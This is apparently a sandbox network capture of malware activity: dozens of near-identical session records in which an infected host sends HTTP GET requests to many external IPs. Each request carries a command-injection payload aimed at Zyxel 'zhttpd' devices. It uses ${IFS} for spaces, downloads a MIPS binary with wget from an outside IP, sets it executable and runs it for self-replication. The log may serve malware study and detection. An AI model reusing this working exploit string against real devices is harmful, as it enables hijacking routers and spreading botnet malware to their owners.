                                                Jan 29, 2024 07:07:40.145756960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2204192.168.2.2360026112.157.102.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.145785093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2205192.168.2.2358276180.88.1.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.145812988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2206192.168.2.234195013.30.129.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.145853996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2207192.168.2.234059061.182.148.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.145914078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2208192.168.2.233856266.137.147.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.145931005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2209192.168.2.235501447.31.121.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.145992041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2210192.168.2.235478823.92.214.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146004915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2211192.168.2.2355960101.9.24.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146054983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2212192.168.2.2334616166.63.206.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146109104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2213192.168.2.235462438.120.49.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146130085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2214192.168.2.2334674151.69.148.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146173000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2215192.168.2.2349880111.132.3.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146226883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2216192.168.2.235094451.20.47.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146255970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2217192.168.2.2355766123.215.41.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146307945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2218192.168.2.2332808191.165.111.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146339893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2219192.168.2.235073287.10.33.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146368027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2220192.168.2.233745892.92.179.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146384954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2221192.168.2.235900098.168.112.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146435976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2222192.168.2.233709470.121.235.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146482944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2223192.168.2.234008689.43.160.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146522045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2224192.168.2.2355092176.249.214.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146567106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2225192.168.2.235478464.244.79.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146588087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2226192.168.2.234221654.87.68.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146630049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2227192.168.2.233286448.228.235.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146657944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2228192.168.2.2340226184.182.118.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146683931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2229192.168.2.2335390150.203.42.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146728992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2230192.168.2.2359908121.158.145.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146780014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2231192.168.2.2348534184.231.40.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146815062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2232192.168.2.234858291.143.41.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146847010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2233192.168.2.233697892.68.222.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146907091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2234192.168.2.2359740114.255.89.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.146991014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2235192.168.2.233488417.161.164.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147026062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2236192.168.2.2339474172.181.11.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147068977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2237192.168.2.233772247.170.68.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147113085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2238192.168.2.2349076122.43.159.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147145987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2239192.168.2.235789813.87.193.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147186995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2240192.168.2.235511225.140.51.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147241116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2241192.168.2.2348986105.2.77.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147272110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2242192.168.2.2344122210.126.177.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147314072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2243192.168.2.2336052130.36.162.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147342920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2244192.168.2.2339274177.35.49.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147371054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2245192.168.2.2350650143.246.61.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147438049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2246192.168.2.2355772167.207.165.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147470951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2247192.168.2.233965254.201.220.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147517920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2248192.168.2.2340432197.80.185.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147548914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2249192.168.2.235259283.156.222.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147578955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2250192.168.2.2359744178.69.5.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147630930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2251192.168.2.2338896133.250.131.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147660017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2252192.168.2.235802478.192.17.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147689104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2253192.168.2.233631079.69.18.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147723913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2254192.168.2.2355412182.167.125.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147778988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2255192.168.2.234882483.199.41.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147829056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2256192.168.2.236037225.245.173.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147871017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2257192.168.2.23539222.139.100.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147896051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2258192.168.2.2358362145.109.102.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147931099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2259192.168.2.2348892210.63.127.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.147973061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2260192.168.2.234002866.232.108.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148022890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2261192.168.2.2360100171.173.203.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148051977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2262192.168.2.2348292186.97.160.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148087978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2263192.168.2.2352516178.251.74.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148122072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2264192.168.2.2353060117.151.153.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148144007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2265192.168.2.2338228155.40.215.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148197889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2266192.168.2.2333732135.155.139.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148217916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2267192.168.2.2335282117.235.204.252443
                                                TimestampBytes transferredDirectionData
